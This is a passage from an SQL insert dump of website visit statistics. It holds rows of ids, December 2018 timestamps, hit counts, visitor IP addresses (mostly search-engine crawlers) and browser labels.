'5.45.207.19','other'),(352071,1544816633,1,1,0,0,'95.163.255.97','other'),(352072,1544816636,1,1,0,0,'95.163.255.93','other'),(352073,1544816683,1,1,0,0,'157.55.39.123','other'),(352074,1544816694,2,2,0,0,'8.29.198.27','other'),(352075,1544816742,4,4,0,0,'178.154.244.11','other'),(352076,1544816762,1,1,0,0,'54.36.149.93','other'),(352077,1544817000,2,2,0,0,'66.249.66.156','chrome'),(352078,1544817072,1,1,0,0,'66.249.66.42','chrome'),(352079,1544817097,2,2,0,0,'95.108.213.4','other'),(352080,1544817157,1,1,0,0,'87.250.224.65','other'),(352081,1544817187,2,2,0,0,'66.249.66.152','chrome'),(352082,1544817373,1,1,0,0,'54.36.148.66','other'),(352083,1544817539,1,1,0,0,'54.36.148.97','other'),(352084,1544817586,1,1,0,0,'5.45.207.79','other'),(352085,1544817684,1,1,0,0,'157.55.39.123','other'),(352086,1544818152,1,1,0,0,'54.36.148.28','other'),(352087,1544818312,1,1,0,0,'54.36.148.209','other'),(352088,1544818366,1,1,0,0,'54.36.148.116','other'),(352089,1544818528,1,1,0,0,'54.36.149.58','other'),(352090,1544818590,1,1,0,0,'207.46.13.40','other'),(352091,1544818662,1,1,0,0,'87.250.224.47','other'),(352092,1544818698,1,1,0,0,'66.249.66.157','chrome'),(352094,1544818703,1,1,0,0,'5.45.207.79','other'),(352095,1544818832,2,2,0,0,'93.73.173.105','chrome'),(352096,1544818961,1,1,0,0,'66.249.66.59','chrome'),(352097,1544819128,1,1,0,0,'54.36.149.49','other'),(352098,1544819218,1,1,0,0,'54.36.148.39','other'),(352099,1544819335,1,1,0,0,'54.36.148.23','other'),(352100,1544819421,1,1,0,0,'207.46.13.83','other'),(352101,1544819852,1,0,1,0,'66.249.66.157',''),(352102,1544819854,1,0,1,0,'66.249.66.154',''),(352103,1544819972,2,2,0,0,'5.45.207.79','other'),(352104,1544820005,1,1,0,0,'66.249.66.61','chrome'),(352105,1544820010,1,1,0,0,'66.249.66.42','chrome'),(352106,1544820051,1,1,0,0,'178.154.244.11','other'),(352107,1544820168,1,1,0,0,'54.36.148.97','other'),(352108,1544820176,2,2,0,0,'66.249.66.154','chrome'),(352109,1544820202,1,1,0,0,'5.45.207.19','other'),(352110,1544820313,2,2,0,0,'91.196.178.130','chrome'),(352111,1544820321,2,2,0,0,'66.249.66.156','chrome'),(352112,1544820341,1,1,0,0,'66.249.66.155','chrome'),(352113,1544820615,1,1,0,0,'54.36.148.190','other'),(352114,1544820823,2,2,0,0,'66.249.66.152','chrome'),(352115,1544821240,1,1,0,0,'66.249.66.156','chrome'),(352116,1544821514,1,1,0,0,'46.229.168.152','other'),(352117,1544821516,1,1,0,0,'46.229.168.143','other'),(352118,1544821847,1,1,0,0,'54.36.148.237','other'),(352119,1544822254,2,2,0,0,'66.249.66.156','chrome'),(352120,1544822301,1,1,0,0,'46.229.168.151','other'),(352121,1544822335,1,1,0,0,'46.229.168.138','other'),(352122,1544822593,1,1,0,0,'46.229.168.150','other'),(352123,1544822684,1,1,0,0,'54.36.149.34','other'),(352124,1544822688,1,1,0,0,'66.249.66.157','chrome'),(352125,1544822738,1,1,0,0,'66.249.66.154','chrome'),(352126,1544822771,2,2,0,0,'66.249.66.44','chrome'),(352127,1544822800,1,1,0,0,'54.36.148.74','other'),(352128,1544822863,1,1,0,0,'66.249.66.152','chrome'),(352129,1544822984,1,1,0,0,'40.77.167.147','other'),(352130,1544823610,2,2,0,0,'157.55.39.147','other'),(352131,1544823913,1,1,0,0,'66.249.66.155','chrome'),(352132,1544823914,2,2,0,0,'66.249.66.154','chrome'),(352133,1544823965,2,2,0,0,'66.249.66.152','chrome'),(352134,1544824182,1,1,0,0,'46.229.168.148','other'),(352135,1544824531,1,1,0,0,'46.211.149.161','chrome'),(352136,1544824678,1,1,0,0,'54.36.148.192','other'),(352137,1544825023,1,1,0,0,'54.36.148.96','other'),(352138,1544825134,1,1,0,0,'40.77.167.147','other'),(352139,1544825326,1,1,0,0,'54.36.148.24','other'),(352140,1544825674,2,2,0,0,'66.249.66.156','chrome'),(352141,1544825822,1,1,0,0,'66.249.66.152','chrome'),(352142,1544825967,1,1,0,0,'54.36.148.188','other'),(352143,1544826125,1,1,0,0,'54.36.149.102','other'),(352144,1544826375,1,1,0,0,'66.249.66.44','chrome'),(352145,1544826379,1,1,0,0,'66.249.66.40','chrome'),(352146,1544826475,1,1,0,0,'46.229.168.139','other'),(352147,1544826477,1,1,0,0,'46.229.168.138','other'),(352148,1544826479,1,1,0,0,'46.229.168.154','other'),(352149,1544826868,3,3,0,0,'95.108.213.4','other'),(352150,1544826877,1,1,0,0,'37.9.113.148','other'),(352151,1544826909,2,2,0,0,'141.8.142.103','other'),(352152,1544826981,3,3,0,0,'5.45.207.19','other'),(352153,1544827021,11,11,0,0,'178.154.244.11','other'),(352154,1544827090,1,1,0,0,'95.163.255.189','other'),(352155,1544827092,1,1,0,0,'95.163.255.156','other'),(352156,1544827154,1,1,0,0,'157.55.39.146','other'),(352157,1544827186,3,3,0,0,'5.45.207.79','other'),(352158,1544827530,1,1,0,0,'8.29.198.27','other'),(352159,1544827563,1,1,0,0,'87.250.224.65','other'),(352160,1544827728,1,1,0,0,'8.29.198.25','other'),(352161,1544827798,1,1,0,0,'66.249.66.154','chrome'),(352162,1544827982,7,7,0,0,'178.154.244.11','other'),(352163,1544828045,1,1,0,0,'66.249.66.44','chrome'),(352164,1544828173,1,1,0,0,'54.36.149.16','other'),(352165,1544828215,1,1,0,0,'87.250.224.47','other'),(352166,1544828216,1,0,1,0,'66.249.66.42',''),(352167,1544828494,1,1,0,0,'5.45.207.19','other'),(352168,1544828617,7,7,0,0,'157.55.39.149','other'),(352169,1544828679,1,1,0,0,'46.229.168.132','other'),(352170,1544828933,1,1,0,0,'54.36.148.103','other'),(352171,1544829346,5,5,0,0,'157.55.39.171','other'),(352172,1544829350,1,1,0,0,'66.249.66.155','chrome'),(352173,1544829351,1,1,0,0,'66.249.66.152','chrome'),(352174,1544829434,1,1,0,0,'178.154.244.11','other'),(352175,1544829762,1,1,0,0,'66.249.66.156','chrome'),(352176,1544830310,1,1,0,0,'46.166.137.214','other'),(352177,1544830325,2,2,0,0,'66.249.66.152','chrome'),(352178,1544830400,1,1,0,0,'46.229.168.153','other'),(352179,1544831139,1,1,0,0,'66.249.66.156','chrome'),(352180,1544831332,1,1,0,0,'54.36.148.107','other'),(352181,1544831401,1,1,0,0,'54.36.149.53','other'),(352182,1544831519,1,1,0,0,'54.36.149.5','other'),(352183,1544831723,1,1,0,0,'54.36.148.52','other'),(352184,1544832538,2,2,0,0,'66.249.66.157','chrome'),(352185,1544832547,3,3,0,0,'66.249.66.156','chrome'),(352186,1544832715,1,1,0,0,'157.55.39.149','other'),(352187,1544832743,1,1,0,0,'54.36.149.2','other'),(352188,1544833305,1,1,0,0,'66.249.66.42','chrome'),(352189,1544833364,1,1,0,0,'66.249.66.152','chrome'),(352190,1544833485,1,1,0,0,'54.36.149.36','other'),(352191,1544833790,1,1,0,0,'157.55.39.149','other'),(352192,1544833831,1,1,0,0,'66.249.66.155','chrome'),(352193,1544833832,1,1,0,0,'66.249.66.156','chrome'),(352194,1544833862,1,1,0,0,'178.154.244.11','other'),(352195,1544833863,2,2,0,0,'5.45.207.19','other'),(352196,1544833870,1,1,0,0,'141.8.142.103','other'),(352197,1544834054,1,1,0,0,'54.36.148.193','other'),(352198,1544834258,1,1,0,0,'54.36.149.101','other'),(352199,1544834928,1,1,0,0,'66.249.66.157','chrome'),(352200,1544834943,3,3,0,0,'66.249.66.154','chrome'),(352201,1544835017,1,1,0,0,'54.36.148.110','other'),(352202,1544835363,1,1,0,0,'77.247.181.165','other'),(352203,1544835365,1,1,0,0,'185.220.101.9','other'),(352204,1544835366,2,2,0,0,'66.249.66.152','chrome'),(352205,1544835538,1,1,0,0,'54.36.148.143','other'),(352206,1544835668,2,2,0,0,'66.249.66.156','chrome'),(352207,1544835729,1,1,0,0,'54.36.148.166','other'),(352208,1544835933,1,1,0,0,'54.36.148.203','other'),(352209,1544836205,1,1,0,0,'209.17.96.194','other'),(352210,1544837644,1,1,0,0,'66.249.66.154','chrome'),(352211,1544837881,1,1,0,0,'66.249.66.152','chrome'),(352212,1544837933,1,1,0,0,'66.249.66.42','chrome'),(352213,1544838366,2,2,0,0,'8.29.198.26','other'),(352214,1544838450,1,1,0,0,'157.55.39.149','other'),(352215,1544838672,2,2,0,0,'141.8.142.103','other'),(352216,1544838693,4,4,0,0,'95.108.213.4','other'),(352217,1544838763,3,3,0,0,'5.45.207.19','other'),(352218,1544838826,1,1,0,0,'87.250.224.65','other'),(352219,1544838829,6,6,0,0,'5.45.207.79','other'),(352220,1544839074,5,5,0,0,'178.154.244.11','other'),(352221,1544839303,1,1,0,0,'66.249.66.154','chrome'),(352222,1544839435,1,1,0,0,'5.188.210.53','chrome'),(352223,1544839553,1,1,0,0,'213.180.203.40','other'),(352224,1544839567,1,1,0,0,'54.36.149.62','other'),(352225,1544839594,1,1,0,0,'95.108.181.57','other'),(352226,1544839718,1,1,0,0,'87.250.224.47','other'),(352227,1544839721,1,1,0,0,'5.45.207.19','other'),(352228,1544839881,2,2,0,0,'157.55.39.149','other'),(352229,1544841257,1,1,0,0,'66.249.66.152','chrome'),(352230,1544841601,1,1,0,0,'207.46.13.85','other'),(352231,1544841698,1,1,0,0,'46.229.168.144','other'),(352232,1544842760,1,1,0,0,'157.55.39.147','other'),(352233,1544843406,1,1,0,0,'54.36.149.15','other'),(352234,1544843871,1,1,0,0,'157.55.39.251','other'),(352235,1544844344,1,1,0,0,'54.36.148.125','other'),(352236,1544844348,1,1,0,0,'207.46.13.85','other'),(352237,1544844857,1,1,0,0,'157.55.39.251','other'),(352238,1544844868,1,1,0,0,'66.249.66.152','chrome'),(352239,1544845022,1,1,0,0,'54.36.148.216','other'),(352240,1544845214,1,1,0,0,'54.36.148.215','other'),(352241,1544845320,1,1,0,0,'54.36.149.87','other'),(352242,1544845337,1,1,0,0,'157.55.39.222','other'),(352243,1544845767,1,1,0,0,'54.36.148.113','other'),(352244,1544845895,1,1,0,0,'39.104.231.102','other'),(352245,1544846148,2,2,0,0,'69.12.66.235','chrome'),(352246,1544846432,1,1,0,0,'54.36.148.93','other'),(352247,1544846465,1,1,0,0,'54.36.148.149','other'),(352248,1544847128,1,1,0,0,'46.229.168.151','other'),(352249,1544847225,1,1,0,0,'54.36.148.234','other'),(352250,1544847260,1,1,0,0,'207.46.13.85','other'),(352251,1544847655,2,2,0,0,'157.55.39.251','other'),(352252,1544847727,1,1,0,0,'46.229.168.140','other'),(352253,1544848113,1,1,0,0,'209.17.96.10','other'),(352254,1544848277,1,1,0,0,'66.249.66.154','chrome'),(352255,1544848516,2,2,0,0,'5.45.207.79','other'),(352256,1544848527,3,3,0,0,'5.45.207.19','other'),(352257,1544848573,2,2,0,0,'95.108.213.4','other'),(352258,1544848588,1,1,0,0,'46.229.168.144','other'),(352259,1544848638,1,1,0,0,'54.36.148.133','other'),(352261,1544848727,2,2,0,0,'46.229.168.152','other'),(352262,1544848818,4,4,0,0,'178.154.244.11','other'),(352263,1544849208,1,1,0,0,'8.29.198.27','other'),(352264,1544849261,1,1,0,0,'40.77.167.71','other'),(352265,1544849370,1,1,0,0,'54.36.149.105','other'),(352266,1544849380,2,2,0,0,'141.8.142.103','other'),(352267,1544849432,1,1,0,0,'8.29.198.25','other'),(352268,1544849660,3,3,0,0,'5.45.207.19','other'),(352269,1544849716,2,2,0,0,'5.45.207.79','other'),(352270,1544849721,4,4,0,0,'178.154.244.11','other'),(352271,1544849759,1,1,0,0,'87.250.224.47','other'),(352272,1544849829,2,2,0,0,'95.213.141.126','opera'),(352273,1544849838,2,2,0,0,'178.133.59.101','chrome'),(352274,1544850036,1,1,0,0,'95.108.213.4','other'),(352275,1544850197,1,1,0,0,'207.46.13.242','other'),(352276,1544850309,1,1,0,0,'141.8.142.103','other'),(352277,1544850324,2,2,0,0,'34.219.157.132','chrome'),(352278,1544850669,1,1,0,0,'178.154.244.11','other'),(352279,1544851110,2,2,0,0,'207.46.13.85','other'),(352280,1544851252,1,1,0,0,'54.36.148.94','other'),(352281,1544852020,1,1,0,0,'46.229.168.146','other'),(352282,1544852022,1,1,0,0,'46.229.168.142','other'),(352283,1544852154,1,1,0,0,'54.36.148.33','other'),(352284,1544852535,1,1,0,0,'54.36.148.32','other'),(352285,1544852637,1,1,0,0,'54.36.148.187','other'),(352286,1544852835,1,1,0,0,'180.76.15.156','other'),(352287,1544852836,1,1,0,0,'180.76.15.34','other'),(352288,1544853042,1,1,0,0,'40.77.167.71','other'),(352289,1544853164,1,1,0,0,'54.36.148.15','other'),(352290,1544853188,2,2,0,0,'5.45.207.79','other'),(352291,1544853229,1,1,0,0,'5.45.207.19','other'),(352292,1544853405,1,1,0,0,'178.154.244.11','other'),(352293,1544853580,1,1,0,0,'87.250.224.47','other'),(352294,1544853745,1,1,0,0,'54.36.148.84','other'),(352295,1544853979,1,1,0,0,'54.36.148.22','other'),(352296,1544854079,1,1,0,0,'157.55.39.251','other'),(352297,1544854183,1,1,0,0,'46.229.168.130','other'),(352298,1544854346,1,1,0,0,'66.249.66.156','chrome'),(352299,1544854649,1,1,0,0,'54.36.148.27','other'),(352300,1544854733,1,1,0,0,'54.36.149.14','other'),(352301,1544854835,1,1,0,0,'180.76.15.138','other'),(352302,1544855084,1,1,0,0,'95.108.213.4','other'),(352303,1544855127,1,1,0,0,'141.8.142.103','other'),(352304,1544855155,2,2,0,0,'5.45.207.79','other'),(352305,1544855157,2,2,0,0,'178.154.244.11','other'),(352306,1544855199,1,1,0,0,'54.36.149.47','other'),(352307,1544855280,1,1,0,0,'87.250.224.65','other'),(352308,1544855729,1,1,0,0,'87.250.224.47','other'),(352309,1544855769,1,1,0,0,'54.36.149.100','other'),(352310,1544856265,1,1,0,0,'66.249.66.154','chrome'),(352311,1544856585,2,2,0,0,'95.108.213.4','other'),(352312,1544857376,1,0,1,0,'66.249.66.154',''),(352313,1544857413,1,1,0,0,'37.9.113.148','other'),(352314,1544857698,1,1,0,0,'95.163.255.119','other'),(352315,1544857708,1,1,0,0,'95.163.255.107','other'),(352316,1544858198,1,1,0,0,'54.36.149.11','other'),(352317,1544858378,1,1,0,0,'54.36.148.17','other'),(352318,1544858852,1,1,0,0,'157.55.39.222','other'),(352319,1544859200,1,1,0,0,'54.36.149.22','other'),(352320,1544859291,1,1,0,0,'46.229.168.141','other'),(352321,1544859530,1,1,0,0,'54.36.148.255','other'),(352322,1544859571,1,1,0,0,'141.8.142.103','other'),(352323,1544859604,2,2,0,0,'178.154.244.11','other'),(352324,1544859627,1,1,0,0,'5.45.207.79','other'),(352325,1544860038,1,1,0,0,'8.29.198.26','other'),(352326,1544860284,1,1,0,0,'8.29.198.27','other'),(352327,1544860409,1,1,0,0,'46.229.168.144','other'),(352328,1544860469,1,1,0,0,'54.36.148.237','other'),(352329,1544860653,3,3,0,0,'5.45.207.79','other'),(352330,1544860927,1,1,0,0,'54.36.148.20','other'),(352331,1544861168,1,1,0,0,'141.8.142.103','other'),(352332,1544861224,1,1,0,0,'95.108.213.4','other'),(352333,1544861227,1,1,0,0,'5.45.207.19','other'),(352334,1544861280,1,1,0,0,'207.46.13.59','other'),(352335,1544861570,1,1,0,0,'5.45.207.79','other'),(352336,1544861700,1,1,0,0,'178.154.244.11','other'),(352337,1544861743,61,61,0,0,'192.166.219.136','other'),(352338,1544862042,1,1,0,0,'46.229.168.153','other'),(352339,1544862841,4,4,0,0,'5.9.144.234','other'),(352340,1544862959,1,1,0,0,'37.73.121.29','chrome'),(352341,1544863251,1,1,0,0,'66.249.66.156','chrome'),(352342,1544863296,2,2,0,0,'162.210.196.97','other'),(352343,1544863862,1,1,0,0,'54.36.148.99','other'),(352344,1544864079,1,1,0,0,'46.229.168.145','other'),(352345,1544864081,1,1,0,0,'46.229.168.148','other'),(352346,1544864187,1,1,0,0,'5.45.207.79','other'),(352348,1544864506,1,1,0,0,'54.36.148.51','other'),(352349,1544865157,1,1,0,0,'54.36.148.86','other'),(352350,1544865359,2,2,0,0,'193.106.144.50','chrome'),(352351,1544865369,1,1,0,0,'37.73.121.29','chrome'),(352352,1544865711,1,1,0,0,'207.46.13.69','other'),(352353,1544865802,1,1,0,0,'54.36.148.28','other'),(352354,1544866471,8,8,0,0,'173.234.159.250','other'),(352355,1544866894,1,1,0,0,'46.229.168.154','other'),(352356,1544866907,1,1,0,0,'54.36.148.195','other'),(352357,1544867495,2,2,0,0,'46.200.230.97','chrome'),(352358,1544867560,1,1,0,0,'54.36.149.87','other'),(352359,1544868196,1,1,0,0,'54.36.148.224','other'),(352360,1544868413,1,1,0,0,'54.36.148.133','other'),(352361,1544868430,1,1,0,0,'46.229.168.141','other'),(352362,1544868577,1,1,0,0,'46.229.168.129','other'),(352363,1544868783,1,1,0,0,'54.36.149.15','other'),(352364,1544868798,2,2,0,0,'54.36.149.82','other'),(352365,1544869275,1,1,0,0,'46.229.168.152','other'),(352366,1544869456,1,1,0,0,'66.249.66.59','chrome'),(352368,1544869753,1,1,0,0,'141.8.142.103','other'),(352369,1544869754,1,1,0,0,'178.154.244.11','other'),(352370,1544869757,1,1,0,0,'95.108.213.4','other'),(352371,1544869758,1,1,0,0,'37.9.113.148','other'),(352372,1544869781,1,1,0,0,'37.73.121.29','chrome'),(352373,1544869915,1,1,0,0,'46.229.168.134','other'),(352374,1544870319,1,1,0,0,'46.229.168.136','other'),(352375,1544870320,1,1,0,0,'46.229.168.152','other'),(352376,1544870874,2,2,0,0,'8.29.198.25','other'),(352377,1544871571,1,1,0,0,'54.36.148.74','other'),(352378,1544871575,1,1,0,0,'54.36.148.238','other'),(352379,1544871695,6,6,0,0,'178.154.244.11','other'),(352380,1544871760,5,5,0,0,'5.45.207.79','other'),(352381,1544871791,7,7,0,0,'5.45.207.19','other'),(352382,1544871993,2,2,0,0,'95.108.213.4','other'),(352383,1544872008,3,3,0,0,'141.8.142.103','other'),(352384,1544872049,1,1,0,0,'87.250.224.47','other'),(352385,1544872214,1,1,0,0,'66.249.66.152','chrome'),(352386,1544872307,1,1,0,0,'54.36.148.244','other'),(352387,1544872689,1,1,0,0,'54.36.149.84','other'),(352388,1544872709,1,1,0,0,'207.46.13.59','other'),(352389,1544872949,4,4,0,0,'5.45.207.79','other'),(352390,1544872963,2,2,0,0,'37.9.113.20','other'),(352391,1544872964,1,1,0,0,'87.250.224.47','other'),(352392,1544872984,3,3,0,0,'141.8.142.103','other'),(352393,1544873084,1,1,0,0,'66.249.66.154','chrome'),(352394,1544873085,1,1,0,0,'54.36.148.207','other'),(352395,1544873254,2,2,0,0,'95.108.213.4','other'),(352396,1544873417,1,1,0,0,'54.36.148.139','other'),(352397,1544873443,1,1,0,0,'178.154.244.49','other'),(352398,1544873471,1,1,0,0,'178.154.244.11','other'),(352399,1544873837,3,3,0,0,'157.55.39.145','other'),(352400,1544874038,1,1,0,0,'54.36.149.61','other'),(352401,1544874269,1,1,0,0,'54.36.148.201','other'),(352402,1544875260,1,1,0,0,'66.249.66.152','chrome'),(352403,1544875803,1,1,0,0,'54.36.148.234','other'),(352404,1544876043,1,1,0,0,'54.36.148.203','other'),(352405,1544876315,1,1,0,0,'54.36.148.70','other'),(352406,1544876504,1,1,0,0,'46.166.137.214','other'),(352407,1544876586,1,1,0,0,'54.36.149.20','other'),(352408,1544876751,2,2,0,0,'207.46.13.63','other'),(352409,1544877521,1,1,0,0,'54.36.148.235','other'),(352410,1544877661,1,1,0,0,'54.36.149.19','other'),(352411,1544877683,1,1,0,0,'54.36.148.23','other'),(352412,1544877842,2,2,0,0,'46.211.26.213','chrome'),(352413,1544878035,1,1,0,0,'157.55.39.221','other'),(352414,1544878424,1,1,0,0,'66.249.66.44','chrome'),(352415,1544878464,1,1,0,0,'66.249.66.152','chrome'),(352416,1544878681,1,1,0,0,'54.36.148.222','other'),(352417,1544879152,1,1,0,0,'54.36.148.66','other'),(352418,1544879571,1,1,0,0,'54.36.148.186','other'),(352419,1544880088,1,1,0,0,'54.36.148.208','other'),(352420,1544880618,1,1,0,0,'54.36.149.53','other'),(352421,1544880832,1,1,0,0,'66.249.66.154','chrome'),(352422,1544881016,1,1,0,0,'66.249.66.155','chrome'),(352423,1544881017,1,1,0,0,'66.249.66.152','chrome'),(352424,1544881235,1,1,0,0,'178.154.244.11','other'),(352425,1544881263,1,1,0,0,'180.76.15.8','other'),(352426,1544881703,1,1,0,0,'8.29.198.27','other'),(352427,1544881890,1,1,0,0,'46.229.168.142','other'),(352428,1544881892,1,1,0,0,'46.229.168.138','other'),(352429,1544881906,1,1,0,0,'66.249.66.157','chrome'),(352430,1544881907,1,1,0,0,'66.249.66.154','chrome'),(352431,1544881934,6,6,0,0,'5.45.207.79','other'),(352432,1544881986,1,1,0,0,'8.29.198.25','other'),(352433,1544882062,1,1,0,0,'87.250.224.47','other'),(352434,1544882066,7,7,0,0,'5.45.207.19','other'),(352435,1544882067,1,1,0,0,'185.216.35.149','firefox'),(352436,1544882074,1,1,0,0,'141.8.142.103','other'),(352437,1544882174,2,2,0,0,'95.108.213.4','other'),(352438,1544882207,3,3,0,0,'178.154.244.11','other'),(352439,1544882257,1,1,0,0,'207.46.13.180','other'),(352440,1544882694,1,1,0,0,'141.8.142.65','other'),(352441,1544882702,1,1,0,0,'141.8.142.191','other'),(352442,1544882894,1,1,0,0,'66.249.66.42','chrome'),(352443,1544882927,1,1,0,0,'66.249.66.152','chrome'),(352444,1544882951,2,2,0,0,'213.180.203.9','other'),(352445,1544882982,1,1,0,0,'54.36.148.55','other'),(352446,1544883030,1,1,0,0,'87.250.224.118','other'),(352447,1544883118,2,2,0,0,'87.250.224.47','other'),(352448,1544883213,1,1,0,0,'37.9.113.103','other'),(352449,1544883325,1,1,0,0,'37.9.113.20','other'),(352450,1544883395,1,1,0,0,'157.55.39.121','other'),(352451,1544883497,1,1,0,0,'66.249.66.57','chrome'),(352452,1544883498,1,1,0,0,'66.249.66.40','chrome'),(352453,1544883835,1,1,0,0,'46.229.168.141','other'),(352454,1544883872,1,1,0,0,'66.249.66.42','chrome'),(352455,1544883982,1,1,0,0,'157.55.39.145','other'),(352456,1544884113,1,1,0,0,'54.36.148.206','other'),(352457,1544884216,1,1,0,0,'54.36.148.52','other'),(352458,1544884235,1,1,0,0,'66.249.66.154','chrome'),(352459,1544884352,1,1,0,0,'91.196.177.4','firefox'),(352460,1544884807,1,1,0,0,'66.249.66.157','chrome'),(352461,1544884893,1,1,0,0,'176.14.243.50','msie'),(352462,1544884967,1,1,0,0,'82.145.209.224','other'),(352463,1544885041,5,5,0,0,'91.196.178.81','chrome'),(352464,1544885208,1,1,0,0,'54.36.149.83','other'),(352465,1544885227,1,1,0,0,'157.55.39.121','other'),(352466,1544885277,1,1,0,0,'95.163.255.115','other'),(352467,1544885302,2,2,0,0,'95.163.255.112','other'),(352468,1544885318,4,4,0,0,'66.249.66.154','chrome'),(352469,1544885338,1,1,0,0,'95.163.255.113','other'),(352470,1544885357,2,2,0,0,'95.163.255.108','other'),(352471,1544885396,1,1,0,0,'54.36.148.208','other'),(352472,1544885422,2,2,0,0,'95.163.255.117','other'),(352473,1544885478,1,1,0,0,'95.163.255.105','other'),(352474,1544885558,1,1,0,0,'66.249.66.40','chrome'),(352475,1544885570,2,2,0,0,'95.163.255.114','other'),(352476,1544885682,1,1,0,0,'95.163.255.107','other'),(352477,1544885689,1,1,0,0,'46.229.168.151','other'),(352478,1544885816,1,1,0,0,'178.154.244.11','other'),(352479,1544885839,1,1,0,0,'5.45.207.79','other'),(352480,1544886123,1,1,0,0,'46.229.168.135','other'),(352481,1544886125,1,1,0,0,'46.229.168.143','other'),(352482,1544886457,1,1,0,0,'54.36.148.171','other'),(352483,1544886459,1,1,0,0,'54.36.148.116','other'),(352484,1544886706,1,1,0,0,'46.229.168.138','other'),(352485,1544886708,1,1,0,0,'46.229.168.144','other'),(352486,1544886827,1,1,0,0,'207.46.13.180','other'),(352487,1544887032,1,1,0,0,'54.36.149.34','other'),(352488,1544887171,1,1,0,0,'95.108.213.4','other'),(352489,1544887311,1,1,0,0,'66.249.66.40','chrome'),(352490,1544887650,1,1,0,0,'66.249.66.156','chrome'),(352491,1544887777,1,1,0,0,'54.36.148.47','other'),(352492,1544887918,1,1,0,0,'54.165.59.7','other'),(352493,1544887954,1,1,0,0,'46.229.168.139','other'),(352494,1544888016,1,1,0,0,'46.229.168.140','other'),(352495,1544888431,1,1,0,0,'66.249.66.157','chrome'),(352496,1544888432,1,1,0,0,'66.249.66.152','chrome'),(352497,1544888485,2,2,0,0,'66.249.66.59','chrome'),(352498,1544888529,1,1,0,0,'54.36.148.27','other'),(352499,1544888571,1,1,0,0,'5.45.207.79','other'),(352500,1544888583,1,1,0,0,'66.249.66.42','chrome'),(352501,1544888947,1,1,0,0,'66.249.66.44','chrome'),(352502,1544889197,1,1,0,0,'54.36.148.55','other'),(352503,1544889211,1,1,0,0,'157.55.39.178','other'),(352504,1544889443,1,1,0,0,'54.36.148.74','other'),(352505,1544889997,3,3,0,0,'141.8.142.103','other'),(352506,1544890001,2,2,0,0,'5.45.207.19','other'),(352507,1544890080,2,2,0,0,'5.45.207.79','other'),(352508,1544890245,1,1,0,0,'54.36.148.135','other'),(352509,1544890263,1,1,0,0,'87.250.224.47','other'),(352510,1544890320,1,1,0,0,'178.154.171.27','other'),(352511,1544890371,2,2,0,0,'157.55.39.145','other'),(352512,1544890387,2,2,0,0,'66.249.66.155','chrome'),(352513,1544890388,1,1,0,0,'66.249.66.156','chrome'),(352514,1544890443,1,1,0,0,'46.229.168.145','other'),(352515,1544890449,2,2,0,0,'66.249.66.152','chrome'),(352516,1544890913,1,1,0,0,'66.249.66.157','chrome'),(352517,1544890957,1,1,0,0,'207.46.13.63','other'),(352518,1544891323,1,1,0,0,'66.249.66.40','chrome'),(352519,1544891676,1,1,0,0,'46.229.168.136','other'),(352520,1544891996,2,2,0,0,'178.154.244.11','other'),(352521,1544892077,3,3,0,0,'66.249.66.154','chrome'),(352522,1544892136,1,1,0,0,'95.108.181.54','other'),(352523,1544892422,3,3,0,0,'5.45.207.19','other'),(352524,1544892494,3,3,0,0,'66.249.66.156','chrome'),(352525,1544892530,1,1,0,0,'66.249.66.42','chrome'),(352526,1544892538,1,1,0,0,'8.29.198.26','other'),(352527,1544892733,1,1,0,0,'93.78.222.51','firefox'),(352528,1544892832,1,1,0,0,'8.29.198.25','other'),(352529,1544892867,3,3,0,0,'141.8.142.103','other'),(352530,1544892935,3,3,0,0,'178.154.244.11','other'),(352531,1544892946,1,1,0,0,'66.249.66.61','chrome'),(352532,1544893017,2,2,0,0,'66.249.66.152','chrome'),(352533,1544893111,1,1,0,0,'54.36.148.119','other'),(352534,1544893139,1,1,0,0,'178.154.171.24','other'),(352535,1544893205,1,1,0,0,'213.180.203.9','other'),(352536,1544893215,1,1,0,0,'213.180.203.40','other'),(352537,1544893316,3,3,0,0,'5.45.207.79','other'),(352538,1544893336,2,2,0,0,'5.45.207.19','other'),(352539,1544893825,1,1,0,0,'46.229.168.138','other'),(352540,1544893828,1,1,0,0,'46.229.168.147','other'),(352541,1544893883,2,2,0,0,'207.46.13.63','other'),(352542,1544894010,1,1,0,0,'40.77.167.190','other'),(352543,1544894133,2,2,0,0,'170.130.1.122','chrome'),(352544,1544894277,1,1,0,0,'5.45.207.79','other'),(352545,1544894784,1,1,0,0,'66.249.66.154','chrome'),(352546,1544894874,1,1,0,0,'95.163.255.66','other'),(352547,1544894881,1,1,0,0,'95.163.255.68','other'),(352548,1544895147,2,2,0,0,'157.55.39.121','other'),(352549,1544895235,1,1,0,0,'157.55.39.145','other'),(352550,1544895306,1,1,0,0,'54.36.149.62','other'),(352551,1544895569,1,1,0,0,'46.175.23.30','chrome'),(352552,1544895630,2,2,0,0,'66.249.66.155','chrome'),(352553,1544895647,2,2,0,0,'66.249.66.152','chrome'),(352554,1544895882,1,1,0,0,'13.57.233.99','chrome'),(352555,1544896159,1,1,0,0,'66.249.66.154','chrome'),(352556,1544896235,3,3,0,0,'66.249.66.156','chrome'),(352557,1544896255,1,1,0,0,'95.163.255.69','other'),(352558,1544896259,1,1,0,0,'95.163.255.65','other'),(352559,1544896292,1,1,0,0,'66.249.66.44','chrome'),(352560,1544896626,1,1,0,0,'207.46.13.180','other'),(352561,1544896630,1,1,0,0,'46.229.168.137','other'),(352562,1544896785,2,2,0,0,'91.196.178.177','chrome'),(352563,1544896961,2,2,0,0,'66.249.66.152','chrome'),(352564,1544897084,1,1,0,0,'54.36.148.188','other'),(352565,1544897095,1,1,0,0,'66.249.66.154','chrome'),(352566,1544897166,1,1,0,0,'157.55.39.121','other'),(352567,1544897228,1,1,0,0,'54.36.149.41','other'),(352568,1544898107,1,1,0,0,'46.229.168.150','other'),(352569,1544898112,1,1,0,0,'54.36.148.241','other'),(352570,1544898134,1,1,0,0,'157.55.39.145','other'),(352571,1544898678,1,1,0,0,'66.249.66.152','chrome'),(352572,1544898831,1,1,0,0,'66.249.66.44','chrome'),(352573,1544898919,1,1,0,0,'176.8.164.186','chrome'),(352574,1544899848,1,1,0,0,'54.36.149.58','other'),(352575,1544900061,1,1,0,0,'66.249.66.42','chrome'),(352576,1544900110,1,1,0,0,'54.36.148.80','other'),(352577,1544900313,1,1,0,0,'46.229.168.153','other'),(352578,1544900315,1,1,0,0,'46.229.168.134','other'),(352579,1544900576,2,2,0,0,'157.55.39.121','other'),(352580,1544900671,2,2,0,0,'40.77.167.190','other'),(352581,1544900915,1,1,0,0,'40.77.167.88','other'),(352582,1544901722,1,1,0,0,'46.229.168.148','other'),(352583,1544901993,1,1,0,0